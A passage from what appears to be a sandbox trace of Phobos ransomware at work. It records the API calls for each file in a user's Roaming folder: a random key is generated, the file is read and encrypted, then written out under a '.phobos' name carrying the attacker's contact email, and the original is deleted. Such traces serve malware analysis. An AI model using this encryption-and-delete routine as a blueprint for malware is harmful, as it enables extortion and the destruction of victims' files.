dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.544] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1244) returned 1 [0195.544] CloseHandle (hObject=0x134) returned 1 [0195.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OP3DdKr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\op3ddkr.m4a")) returned 0x2020 [0195.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OP3DdKr.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\op3ddkr.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OP3DdKr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\op3ddkr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.544] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.544] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OP3DdKr.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\op3ddkr.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.545] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.545] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.545] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4dc, lpOverlapped=0x0) returned 1 [0195.570] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4e0) returned 1 [0195.570] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4e0, lpOverlapped=0x0) returned 1 [0195.571] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0195.571] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.571] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.571] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.571] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.571] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.571] CloseHandle (hObject=0x134) returned 1 [0195.571] CloseHandle (hObject=0x180) returned 1 [0195.571] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OP3DdKr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\op3ddkr.m4a")) returned 1 [0195.572] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OUV71DC5.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouv71dc5.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.574] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=83380) returned 1 [0195.574] CloseHandle (hObject=0x180) returned 1 [0195.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OUV71DC5.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouv71dc5.swf")) returned 0x2020 [0195.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OUV71DC5.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouv71dc5.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OUV71DC5.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouv71dc5.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.574] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.574] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OUV71DC5.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouv71dc5.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.575] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.575] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.575] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x145b4, lpOverlapped=0x0) returned 1 [0195.576] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x145c0, dwBufLen=0x145c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x145c0) returned 1 [0195.577] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x145c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x145c0, lpOverlapped=0x0) returned 1 [0195.579] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0195.579] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.579] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.579] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.579] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.579] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.579] CloseHandle (hObject=0x180) returned 1 [0195.579] CloseHandle (hObject=0x134) returned 1 [0195.579] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OUV71DC5.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouv71dc5.swf")) returned 1 [0195.580] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qq3rksI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qq3rksi.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.581] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=87995) returned 1 [0195.581] CloseHandle (hObject=0x134) returned 1 [0195.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qq3rksI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qq3rksi.docx")) returned 0x2020 [0195.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qq3rksI.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qq3rksi.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qq3rksI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qq3rksi.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.581] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.581] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qq3rksI.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qq3rksi.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.582] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.582] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.582] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x157bb, lpOverlapped=0x0) returned 1 [0195.584] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x157c0, dwBufLen=0x157c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x157c0) returned 1 [0195.584] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x157c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x157c0, lpOverlapped=0x0) returned 1 [0195.586] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0195.586] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.586] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.586] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.586] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.586] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.586] CloseHandle (hObject=0x134) returned 1 [0195.586] CloseHandle (hObject=0x180) returned 1 [0195.586] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qq3rksI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qq3rksi.docx")) returned 1 [0195.587] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\R JNgCX-Stdfyzmy mFA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\r jngcx-stdfyzmy mfa.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.588] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=74637) returned 1 [0195.588] CloseHandle (hObject=0x180) returned 1 [0195.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\R JNgCX-Stdfyzmy mFA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\r jngcx-stdfyzmy mfa.avi")) returned 0x2020 [0195.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\R JNgCX-Stdfyzmy mFA.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\r jngcx-stdfyzmy mfa.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\R JNgCX-Stdfyzmy mFA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\r jngcx-stdfyzmy mfa.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.588] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.589] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\R JNgCX-Stdfyzmy mFA.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\r jngcx-stdfyzmy mfa.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.589] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.589] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.589] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1238d, lpOverlapped=0x0) returned 1 [0195.591] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12390, dwBufLen=0x12390 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12390) returned 1 [0195.591] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x12390, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x12390, lpOverlapped=0x0) returned 1 [0195.593] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0195.593] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.593] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0195.593] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.593] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0195.593] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.593] CloseHandle (hObject=0x180) returned 1 [0195.593] CloseHandle (hObject=0x134) returned 1 [0195.593] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\R JNgCX-Stdfyzmy mFA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\r jngcx-stdfyzmy mfa.avi")) returned 1 [0195.594] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tnjr.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tnjr.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.595] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=8312) returned 1 [0195.595] CloseHandle (hObject=0x134) returned 1 [0195.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tnjr.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tnjr.pdf")) returned 0x2020 [0195.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tnjr.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tnjr.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tnjr.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tnjr.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.596] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tnjr.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tnjr.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.596] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.596] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.596] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2078, lpOverlapped=0x0) returned 1 [0195.598] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2080, dwBufLen=0x2080 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2080) returned 1 [0195.598] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2080, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2080, lpOverlapped=0x0) returned 1 [0195.599] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0195.599] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.599] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.599] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.599] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.599] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.599] CloseHandle (hObject=0x134) returned 1 [0195.599] CloseHandle (hObject=0x180) returned 1 [0195.599] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tnjr.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tnjr.pdf")) returned 1 [0195.600] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uk6Qo-ok7CDEt9a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uk6qo-ok7cdet9a.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.601] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=46471) returned 1 [0195.601] CloseHandle (hObject=0x180) returned 1 [0195.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uk6Qo-ok7CDEt9a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uk6qo-ok7cdet9a.csv")) returned 0x2020 [0195.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uk6Qo-ok7CDEt9a.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uk6qo-ok7cdet9a.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uk6Qo-ok7CDEt9a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uk6qo-ok7cdet9a.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.601] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.601] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 